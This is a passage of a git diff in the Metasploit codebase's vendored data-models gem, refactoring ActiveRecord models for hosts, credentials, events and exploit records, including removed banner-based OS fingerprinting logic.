"bundler/gem_tasks" +require 'bundler/gem_tasks' +require 'rspec/core/rake_task' + +RSpec::Core::RakeTask.new(:spec) + +task :default => :spec + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb index fbf08daa2c..0422b7a3d9 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb @@ -1,22 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::ApiKey - def self.included(base) - base.class_eval { +class Mdm::ApiKey < ActiveRecord::Base + # + # Validators + # - validate do |key| - lic = License.get + validate :supports_api + validates :token, :presence => true, :length => { :minimum => 8 } - if lic and not lic.supports_api? - key.errors[:unsupported_product] = " - this product does not support API access" - end + protected - if key.token.to_s.empty? - key.errors[:blank_token] = " - the specified authentication token is empty" - end + def supports_api + license = License.get - if key.token.to_s.length < 8 - key.errors[:token_too_short] = " - the specified authentication token must be at least 8 characters long" - end - end - } + if license and not license.supports_api? + errors[:license] = " - this product does not support API access" + end end + + ActiveSupport.run_load_hooks(:mdm_api_key, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb index 2e99613ade..ae0ac1914e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Client - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :campaign, :class_name => "Campaign" - } - end +class Mdm::Client < ActiveRecord::Base + # + # Relations + # + belongs_to :campaign, :class_name => 'Mdm::Campaign' + belongs_to :host, :class_name => 'Mdm::Host' + + ActiveSupport.run_load_hooks(:mdm_client, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb index d71bf8a45e..9c5e01156f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb @@ -1,78 +1,80 @@ -module MetasploitDataModels::ActiveRecordModels::Cred - def self.included(base) - base.class_eval{ - belongs_to :service, :class_name => "Mdm::Service" +class Mdm::Cred < ActiveRecord::Base + # + # CONSTANTS + # + KEY_ID_REGEX = /([0-9a-fA-F:]{47})/ + PTYPES = { + 'read/write password' => 'password_rw', + 'read-only password' => 'password_ro', + 'SMB hash' => 'smb_hash', + 'SSH private key' => 'ssh_key', + 'SSH public key' => 'ssh_pubkey' + } - unless defined? PTYPES - const_def =<<-CONST_DEF - PTYPES = { - "read/write password" => "password_rw", - "read-only password" => "password_ro", - "SMB hash" => "smb_hash", - "SSH private key" => "ssh_key", - "SSH public key" => "ssh_pubkey" - } - CONST_DEF - eval(const_def) - end + # + # Relations + # + belongs_to :service, :class_name => "Mdm::Service" - eval("KEY_ID_REGEX = /([0-9a-fA-F:]{47})/") unless defined?(KEY_ID_REGEX) # Could be more strict + def ptype_human + humanized = PTYPES.select do |k, v| + v == ptype + end.keys[0] - def ptype_human - humanized = PTYPES.select do |k, v| - v == ptype - end.keys[0] - - humanized ? humanized : ptype - end - - # Returns its workspace - def workspace - self.service.host.workspace - end - - # Returns its key id. If this is not an ssh-type key, returns nil. - def ssh_key_id - return nil unless self.ptype =~ /^ssh_/ - return nil unless self.proof =~ KEY_ID_REGEX - $1.downcase # Can't run into NilClass problems. - end - - # Returns all private keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. - def ssh_private_keys - return [] unless self.ssh_key_id - matches = self.class.all(:conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_key", "%#{self.ssh_key_id}%"]) - matches.select {|c| c.workspace == self.workspace} - end - - # Returns all public keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. - def ssh_public_keys - return [] unless self.ssh_key_id - matches = self.class.all(:conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_pubkey", "%#{self.ssh_key_id}%"]) - matches.select {|c| c.workspace == self.workspace} - end - - # Returns all keys with matching key ids, including itself - # If this is not an ssh-type key, always returns an empty array. - def ssh_keys - (self.ssh_private_keys | self.ssh_public_keys) - end - - def ssh_key_matches?(other_cred) - return false unless other_cred.kind_of? self.class - return false unless self.ptype == other_cred.ptype - case self.ptype - when "ssh_key" - matches = self.ssh_private_keys - when "ssh_pubkey" - matches = self.ssh_public_keys - else - false - end - matches.include?(self) and matches.include?(other_cred) - end - } + humanized ? humanized : ptype end + + # Returns its key id. If this is not an ssh-type key, returns nil. + def ssh_key_id + return nil unless self.ptype =~ /^ssh_/ + return nil unless self.proof =~ KEY_ID_REGEX + $1.downcase # Can't run into NilClass problems. + end + + def ssh_key_matches?(other_cred) + return false unless other_cred.kind_of? self.class + return false unless self.ptype == other_cred.ptype + case self.ptype + when "ssh_key" + matches = self.ssh_private_keys + when "ssh_pubkey" + matches = self.ssh_public_keys + else + false + end + matches.include?(self) and matches.include?(other_cred) + end + + # Returns all keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_keys + (self.ssh_private_keys | self.ssh_public_keys) + end + + # Returns all private keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_private_keys + return [] unless self.ssh_key_id + matches = self.class.all( + :conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_key", "%#{self.ssh_key_id}%"] + ) + matches.select {|c| c.workspace == self.workspace} + end + + # Returns all public keys with matching key ids, including itself + # If this is not an ssh-type key, always returns an empty array. + def ssh_public_keys + return [] unless self.ssh_key_id + matches = self.class.all( + :conditions => ["creds.ptype = ? AND creds.proof ILIKE ?", "ssh_pubkey", "%#{self.ssh_key_id}%"] + ) + matches.select {|c| c.workspace == self.workspace} + end + + # Returns its workspace + def workspace + self.service.host.workspace + end + + ActiveSupport.run_load_hooks(:mdm_cred, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb index 5427d8b9c9..f8bc29d84c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb @@ -1,8 +1,8 @@ -module MetasploitDataModels::ActiveRecordModels::CredFile - def self.included(base) - base.class_eval{ +class Mdm::CredFile < ActiveRecord::Base + # + # Relations + # + belongs_to :workspace, :class_name => 'Mdm::Workspace' - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end + ActiveSupport.run_load_hooks(:mdm_cred_file, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb index 34ab57fcad..e495272312 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb @@ -1,16 +1,30 @@ -module MetasploitDataModels::ActiveRecordModels::Event - def self.included(base) - base.class_eval{ - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host +class Mdm::Event < ActiveRecord::Base + # + # Relations + # - serialize :info, ::MetasploitDataModels::Base64Serializer.new + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - scope :flagged, where(:critical => true, :seen => false) - scope :module_run, where(:name => 'module_run') + # + # Scopes + # - validates_presence_of :name - } - end + scope :flagged, where(:critical => true, :seen => false) + scope :module_run, where(:name => 'module_run') + + # + # Serializations + # + + serialize :info, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_event, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb index 99c8a5be9d..edd42d6dfe 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::ExploitAttempt - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :exploit_attempt_count - validates :host_id, :presence => true - } - end +class Mdm::ExploitAttempt < ActiveRecord::Base + # + # Relations + # + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :exploit_attempt_count + + # + # Validations + # + + validates :host_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_exploit_attempt, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb index 1b54058fee..8d55119220 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb @@ -1,9 +1,11 @@ -module MetasploitDataModels::ActiveRecordModels::ExploitedHost - def self.included(base) - base.class_eval{ - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :service, :class_name => "Mdm::Service" - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end +class Mdm::ExploitedHost < ActiveRecord::Base + # + # Relations + # + + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :service, :class_name => 'Mdm::Service' + belongs_to :workspace, :class_name => 'Mdm::Workspace' + + ActiveSupport.run_load_hooks(:mdm_exploited_host, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb index 16b462101e..c31f4c3bb4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb @@ -1,1058 +1,134 @@ -module MetasploitDataModels::ActiveRecordModels::Host - def self.included(base) - base.class_eval{ - belongs_to :workspace, :class_name => "Mdm::Workspace" - # hosts_tags are cleaned up in before_destroy: - has_many :hosts_tags, :class_name => "Mdm::HostTag" - has_many :tags, :through => :hosts_tags, :class_name => "Mdm::Tag" - has_many :services, :dependent => :destroy, :class_name => "Mdm::Service", :order => "services.port, services.proto" - has_many :clients, :dependent => :delete_all, :class_name => "Mdm::Client" - has_many :vulns, :dependent => :delete_all, :class_name => "Mdm::Vuln" - has_many :notes, :dependent => :delete_all, :class_name => "Mdm::Note", :order => "notes.created_at" - has_many :loots, :dependent => :destroy, :class_name => "Mdm::Loot", :order => "loots.created_at desc" - has_many :sessions, :dependent => :destroy, :class_name => "Mdm::Session", :order => "sessions.opened_at" - - has_many :service_notes, :through => :services - has_many :web_sites, :through => :services, :class_name => "Mdm::WebSite" - has_many :creds, :through => :services, :class_name => "Mdm::Cred" - has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost" - - has_many :host_details, :dependent => :destroy, :class_name => "Mdm::HostDetail" - has_many :exploit_attempts, :dependent => :destroy, :class_name => "Mdm::ExploitAttempt" - - validates :address, :presence => true, :ip_format => true - validates_exclusion_of :address, :in => ['127.0.0.1'] - validates_uniqueness_of :address, :scope => :workspace_id, :unless => Proc.new { |host| host.ip_address_invalid? } - - before_destroy :cleanup_tags - - # This is replicated by the IpAddressValidator class. Had to put it here as well to avoid - # SQL errors when checking address uniqueness. - def ip_address_invalid? - begin - potential_ip = IPAddr.new(address) - return true unless potential_ip.ipv4? || potential_ip.ipv6? - rescue ArgumentError - return true - end - end - - validates_presence_of :workspace - - scope :alive, where({'hosts.state' => 'alive'}) - scope :search, lambda { |*args| {:conditions => - [ %w{address::text hosts.name os_name os_flavor os_sp mac purpose comments}.map{|c| "#{c} ILIKE ?"}.join(" OR ") ] + [ "%#{args[0]}%" ] * 8 } - } - scope :tag_search, - lambda { |*args| where("tags.name" => args[0]).includes(:tags) } - - scope :flagged, where('notes.critical = true AND notes.seen = false').includes(:notes) - - def is_vm? - !!self.virtual_host - end - - def attribute_locked?(attr) - n = notes.find_by_ntype("host.updated.#{attr}") - n && n.data[:locked] - end - - accepts_nested_attributes_for :services, :reject_if => lambda { |s| s[:port].blank? }, :allow_destroy => true - - def cleanup_tags - # No need to keep tags with no hosts - tags.each do |tag| - tag.destroy if tag.hosts == [self] - end - # Clean up association table records - Mdm::HostTag.delete_all("host_id = #{self.id}") - end - - # Determine if the fingerprint data is readable. If not, it nearly always - # means that there was a problem with the YAML or the Marshal'ed data, - # so let's log that for later investigation. - def validate_fingerprint_data(fp) - if fp.data.kind_of?(Hash) and !fp.data.empty? - return true - elsif fp.ntype == "postgresql.fingerprint" - # Special case postgresql.fingerprint; it's always a string, - # and should not be used for OS fingerprinting (yet), so - # don't bother logging it. TODO: fix os fingerprint finding, this - # name collision seems silly. - return false - else - dlog("Could not validate fingerprint data: #{fp.inspect}") - return false - end - end - - # - # Normalize the operating system fingerprints provided by various scanners - # (nmap, nexpose, retina, nessus, etc). - # - # These are stored as notes (instead of directly in the os_* fields) - # specifically for this purpose. - # - def normalize_os - host = self - - wname = {} # os_name == Linux, Windows, Mac OS X, VxWorks - wtype = {} # purpose == server, client, device - wflav = {} # os_flavor == Ubuntu, Debian, 2003, 10.5, JetDirect - wvers = {} # os_sp == 9.10, SP2, 10.5.3, 3.05 - warch = {} # arch == x86, PPC, SPARC, MIPS, '' - wlang = {} # os_lang == English, '' - whost = {} # hostname - - # Note that we're already restricting the query to this host by using - # host.notes instead of Note, so don't need a host_id in the - # conditions. - fingerprintable_notes = self.notes.where("ntype like '%%fingerprint'") - fingerprintable_notes.each do |fp| - next if not validate_fingerprint_data(fp) - norm = normalize_scanner_fp(fp) - wvers[norm[:os_sp]] = wvers[norm[:os_sp]].to_i + (100 * norm[:certainty]) - wname[norm[:os_name]] = wname[norm[:os_name]].to_i + (100 * norm[:certainty]) - wflav[norm[:os_flavor]] = wflav[norm[:os_flavor]].to_i + (100 * norm[:certainty]) - warch[norm[:arch]] = warch[norm[:arch]].to_i + (100 * norm[:certainty]) - whost[norm[:name]] = whost[norm[:name]].to_i + (100 * norm[:certainty]) - wtype[norm[:type]] = wtype[norm[:type]].to_i + (100 * norm[:certainty]) - end - - # Grab service information and assign scores. Some services are - # more trustworthy than others. If more services agree than not, - # than that should be considered as well. - # Each service has a starting number of points. Services that - # are more difficult to fake are awarded more points. The points - # represent a running total, not a fixed score. - # XXX: This needs to be refactored in a big way. Tie-breaking is - # pretty arbitrary, it would be nice to explicitly believe some - # services over others, but that means recording which service - # has an opinion and which doesn't. It would also be nice to - # identify "impossible" combinations of services and alert that - # something funny is going on. - # XXX: This hack solves the memory leak generated by self.services.each {} - fingerprintable_services = self.services.where("name is not null and name != '' and info is not null and info != ''") - fingerprintable_services.each do |s| - points = 0 - case s.name - when 'smb' - points = 210 - case s.info - when /\.el([23456])(\s+|$)/ # Match Samba 3.0.33-0.30.el4 as RHEL4 - wname['Linux'] = wname['Linux'].to_i + points - wflav["RHEL" + $1] = wflav["RHEL" + $1].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /(ubuntu|debian|fedora|red ?hat|rhel)/i - wname['Linux'] = wname['Linux'].to_i + points - wflav[$1.capitalize] = wflav[$1.capitalize].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /^Windows/ - win_sp = nil - win_flav = nil - win_lang = nil - - ninfo = s.info - ninfo.gsub!('(R)', '') - ninfo.gsub!('(TM)', '') - ninfo.gsub!(/\s+/, ' ') - ninfo.gsub!('No Service Pack', 'Service Pack 0') - - # Windows (R) Web Server 2008 6001 Service Pack 1 (language: Unknown) (name:PG-WIN2008WEB) (domain:WORKGROUP) - # Windows XP Service Pack 3 (language: English) (name:EGYPT-B3E55BF3C) (domain:EGYPT-B3E55BF3C) - # Windows 7 Ultimate (Build 7600) (language: Unknown) (name:WIN7) (domain:WORKGROUP) - # Windows 2003 No Service Pack (language: Unknown) (name:VMWIN2003) (domain:PWNME) - - #if ninfo =~ /^Windows ([^\s]+)(.*)(Service Pack |\(Build )([^\(]+)\(/ - if ninfo =~ /^Windows (.*)(Service Pack [^\s]+|\(Build [^\)]+\))/ - win_flav = $1.strip - win_sp = ($2).strip - win_sp.gsub!(/with.*/, '') - win_sp.gsub!('Service Pack', 'SP') - win_sp.gsub!('Build', 'b') - win_sp.gsub!(/\s+/, '') - win_sp.tr!("()", '') - else - if ninfo =~ /^Windows ([^\s+]+)([^\(]+)\(/ - win_flav = $2.strip - end - end - - - if ninfo =~ /name: ([^\)]+)\)/ - hostname = $1.strip - end - - if ninfo =~ /language: ([^\)]+)\)/ - win_lang = $1.strip - end - - win_lang = nil if win_lang =~ /unknown/i - win_vers = win_sp - - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wlang[win_lang] = wlang[win_lang].to_i + points if win_lang - wflav[win_flav] = wflav[win_flav].to_i + points if win_flav - wvers[win_vers] = wvers[win_vers].to_i + points if win_vers - whost[hostname] = whost[hostname].to_i + points if hostname - - case win_flav - when /NT|2003|2008/ - win_type = 'server' - else - win_type = 'client' - end - wtype[win_type] = wtype[win_type].to_i + points - end - - when 'ssh' - points = 104 - case s.info - when /honeypot/i # Never trust this - nil - when /ubuntu/i - # This needs to be above /debian/ becuase the ubuntu banner contains both, e.g.: - # SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6 - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /debian/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Debian'] = wflav['Debian'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /FreeBSD/ - wname['FreeBSD'] = wname['FreeBSD'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /sun_ssh/i - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /vshell|remotelyanywhere|freessh/i - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /radware/i - wname['RadWare'] = wname['RadWare'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /dropbear/i - wname['Linux'] = wname['Linux'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /netscreen/i - wname['NetScreen'] = wname['NetScreen'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /vpn3/ - wname['Cisco VPN 3000'] = wname['Cisco VPN 3000'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /cisco/i - wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /mpSSH/ - wname['HP iLO'] = wname['HP iLO'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end - when 'http' - points = 99 - case s.info - when /iSeries/ - wname['IBM iSeries'] = wname['IBM iSeries'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Mandrake/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Mandrake'] = wflav['Mandrake'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Mandriva/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Mandrake'] = wflav['Mandrake'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Ubuntu/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Debian/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Debian'] = wflav['Debian'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Fedora/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Fedora'] = wflav['Fedora'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /CentOS/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['CentOS'] = wflav['CentOS'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /RHEL/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['RHEL'] = wflav['RHEL'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Red.?Hat/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Red Hat'] = wflav['Red Hat'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /SuSE/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['SUSE'] = wflav['SUSE'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /TurboLinux/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['TurboLinux'] = wflav['TurboLinux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Gentoo/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Gentoo'] = wflav['Gentoo'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Conectiva/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Conectiva'] = wflav['Conectiva'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Asianux/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Asianux'] = wflav['Asianux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Trustix/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Trustix'] = wflav['Trustix'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /White Box/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['White Box'] = wflav['White Box'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /UnitedLinux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['UnitedLinux'] = wflav['UnitedLinux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /PLD\/Linux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['PLD/Linux'] = wflav['PLD/Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Vine\/Linux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['Vine/Linux'] = wflav['Vine/Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /rPath/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['rPath'] = wflav['rPath'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /StartCom/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['StartCom'] = wflav['StartCom'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /linux/i - wname['Linux'] = wname['Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /PalmOS/ - wname['PalmOS'] = wname['PalmOS'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/[234]\.0/ - wname['Microsoft Windows NT 4.0'] = wname['Microsoft Windows NT 4.0'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/5\.0/ - wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/5\.1/ - wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/6\.0/ - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/7\.0/ - wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Win32/i - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /DD\-WRT ([^\s]+) /i - wname['Linux'] = wname['Linux'].to_i + points - wflav['DD-WRT'] = wflav['DD-WRT'].to_i + points - wvers[$1.strip] = wvers[$1.strip].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Darwin/ - wname['Apple Mac OS X'] = wname['Apple Mac OS X'].to_i + points - - when /FreeBSD/i - wname['FreeBSD'] = wname['FreeBSD'].to_i + points - - when /OpenBSD/i - wname['OpenBSD'] = wname['OpenBSD'].to_i + points - - when /NetBSD/i - wname['NetBSD'] = wname['NetBSD'].to_i + points - - when /NetWare/i - wname['Novell NetWare'] = wname['Novell NetWare'].to_i + points - - when /OpenVMS/i - wname['OpenVMS'] = wname['OpenVMS'].to_i + points - - when /SunOS|Solaris/i - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - - when /HP.?UX/i - wname['HP-UX'] = wname['HP-UX'].to_i + points - end - when 'snmp' - points = 103 - case s.info - when /^Sun SNMP Agent/ - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^SunOS ([^\s]+) ([^\s]+) / - # XXX 1/2 XXX what does this comment mean i wonder - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Linux ([^\s]+) ([^\s]+) / - whost[$1] = whost[$1].to_i + points - wname['Linux ' + $2] = wname['Linux ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - arch = get_arch_from_string(s.info) - warch[arch] = warch[arch].to_i + points if arch - wtype['server'] = wtype['server'].to_i + points - - when /^Novell NetWare ([^\s]+)/ - wname['Novell NetWare ' + $1] = wname['Novell NetWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - arch = "x86" - warch[arch] = warch[arch].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Novell UnixWare ([^\s]+)/ - wname['Novell UnixWare ' + $1] = wname['Novell UnixWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - arch = "x86" - warch[arch] = warch[arch].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^HP-UX ([^\s]+) ([^\s]+) / - # XXX - wname['HP-UX ' + $2] = wname['HP-UX ' + $2].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^IBM PowerPC.*Base Operating System Runtime AIX version: (\d+\.\d+)/ - wname['IBM AIX ' + $1] = wname['IBM AIX ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^SCO TCP\/IP Runtime Release ([^\s]+)/ - wname['SCO UnixWare ' + $1] = wname['SCO UnixWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /.* IRIX version ([^\s]+)/ - wname['SGI IRIX ' + $1] = wname['SGI IRIX ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Unisys ([^\s]+) version ([^\s]+) kernel/ - wname['Unisys ' + $2] = wname['Unisys ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - whost[$1] = whost[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /.*OpenVMS V([^\s]+) / - # XXX - wname['OpenVMS ' + $1] = wname['OpenVMS ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows NT Version ([^\s]+) / - wname['Microsoft Windows NT ' + $1] = wname['Microsoft Windows NT ' + $1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows 2000 Version 5\.0/ - wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows 2000 Version 5\.1/ - wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows Version 5\.2/ - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - # XXX: TODO 2008, Vista, Windows 7 - - when /^Microsoft Windows CE Version ([^\s]+)+/ - wname['Microsoft Windows CE ' + $1] = wname['Microsoft Windows CE ' + $1].to_i + points - wtype['client'] = wtype['client'].to_i + points - - when /^IPSO ([^\s]+) ([^\s]+) / - whost[$1] = whost[$1].to_i + points - wname['Nokia IPSO ' + $2] = wname['Nokia IPSO ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - arch = get_arch_from_string(s.info) - warch[arch] = warch[arch].to_s + points if arch - wtype['device'] = wtype['device'].to_i + points - - when /^Sun StorEdge/ - wname['Sun StorEdge'] = wname['Sun StorEdge'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /^HP StorageWorks/ - wname['HP StorageWorks'] = wname['HP StorageWorks'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /^Network Storage/ - # 